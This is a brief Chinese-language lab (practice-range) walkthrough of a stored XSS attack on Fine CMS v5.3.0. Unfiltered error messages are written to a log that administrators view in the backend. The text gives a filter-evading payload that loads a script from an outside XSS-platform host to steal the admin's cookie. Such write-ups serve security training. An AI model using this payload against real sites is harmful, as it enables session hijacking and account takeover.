1.访问靶场
靶场cms是Fine CMS,版本是v5.3.0
2.寻找CMS已知漏洞,尝试攻击
网上搜索已知的Fine CMS的XSS漏洞利用信息
参考网站:https://www.freebuf.com/column/165269.html
漏洞根因:简而言之,该cms会将错误日志写入文件,但是写入过程中没有对错误信息过滤,直接写入了文件。然后该cms后台提供错误日志查看功能,错误日志信息直接读取上述文件,当管理员在后台查看错误日志时,程序从文件中读取日志信息。所以攻击点在于控制错误日志的信息。当错误日志写入文件的信息可控时,管理员在后台查看错误日志,就可以触发存储型xss,从而窃取管理员的cookie信息。
结合已知漏洞利用方式和准备好的XSS平台攻击代码生成攻击payload:c=mail&m=test<sCRiPt sRC=//hk.sb/m85F></sCrIpT>
然后在xss平台查看获取的信息